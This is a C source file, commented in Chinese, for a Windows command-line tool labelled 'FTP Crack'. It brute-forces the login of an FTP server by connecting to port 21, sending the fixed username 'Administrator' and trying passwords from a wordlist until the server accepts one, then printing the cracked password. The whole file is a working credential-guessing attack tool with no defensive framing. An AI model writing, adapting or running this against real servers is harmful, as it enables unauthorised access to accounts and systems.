// 2019/11/28 FTP Crack
// FTP 服务器登录暴力破解
#include <WinSock2.h>
#include <windows.h>
#include <WS2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment (lib, “ws2_32.lib”)
#pragma comment (lib, “Mswsock.lib”)
#pragma comment (lib, “AdvApi32.lib”)
#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT “21”
#define FTP_USER_OK “331”
#define FTP_PASS_OK “230”
int __cdecl main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET ConnectSocket = INVALID_SOCKET;
struct addrinfo *result = NULL, *ptr = NULL, hints;
char recvbuf[DEFAULT_BUFLEN];
int iResult;
int recvbuflen = DEFAULT_BUFLEN;
// 检验参数合法性
if (argc != 3) {
fprintf(stderr, “usage: %s ftp-server password-txt\n”, argv[0]);
return 1;
}
WSAStartup(MAKEWORD(2, 2), &wsaData);
ZeroMemory(&hints, sizeof(hints));
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
iResult = getaddrinfo(argv[1], DEFAULT_PORT, &hints, &result);
if (iResult != 0) {
fprintf(stderr, "getaddrinfo failed with error: %d\n", iResult);
WSACleanup();
return 1;
}
// 尝试连接服务器地址
for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
// 创建套接字
ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (ConnectSocket == INVALID_SOCKET) {
fprintf(stderr, "socket failed with error: %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// 向服务器连接
iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
if (iResult == SOCKET_ERROR) {
closesocket(ConnectSocket);
ConnectSocket = INVALID_SOCKET;
continue;
}
break;
}
freeaddrinfo(result);
if (ConnectSocket == INVALID_SOCKET) {
fprintf(stderr, "Unable to connect to server!\n");
WSACleanup();
return 1;
}
// 打开字典文件
char sendbuf[DEFAULT_BUFLEN] = { 0 };
char password[40] = { 0 };
FILE *fp = NULL;
fp = fopen(argv[2], "r");
if (fp == NULL)
{
fprintf(stderr, "%s 无法打开\n", argv[2]);
return 1;
}
DWORD StartTime = GetTickCount();
DWORD EndTime = 0;
do
{
// 接受ftp服务器的220消息
iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0);
if (iResult < 0)
{
fprintf(stderr, "recv error\n");
break;
}
// 构造一个默认用户名
strcpy(sendbuf, "USER ");
strcat(sendbuf, "Administrator");
strcat(sendbuf, "\r\n");
iResult = send(ConnectSocket, sendbuf, strlen(sendbuf) + 1, 0);
if (iResult < 0)
{
fprintf(stderr, "send error\n");
break;
}
iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0);
if (iResult < 0)
{
fprintf(stderr, "recv error\n");
break;
}
else
{
// 读取密码, 穷举密码
if (fscanf(fp, "%s", password) != 1)
{
fprintf(stderr, "破解失败\n");
break;
}
// 用户名是否正确
if (strstr(recvbuf, FTP_USER_OK) != NULL)
{
strcpy(sendbuf, "PASS ");
strcat(sendbuf, password);
strcat(sendbuf, "\r\n");
iResult = send(ConnectSocket, sendbuf, strlen(sendbuf) + 1, 0);
if (iResult < 0)
{
fprintf(stderr, "send error\n");
break;
}
iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0);
if (iResult < 0)
{
fprintf(stderr, "recv error\n");
break;
}
// 密码是否正确
if (strstr(recvbuf, FTP_PASS_OK) != NULL)
{
printf("破解成功\n");
printf("密码: %s\n", password);
EndTime = GetTickCount() - StartTime;
printf("用时: %.2fs\n", (float)EndTime / 1000);
break;
}
}
}
} while (iResult > 0);
fclose(fp);
closesocket(ConnectSocket);
WSACleanup();
return 0;
}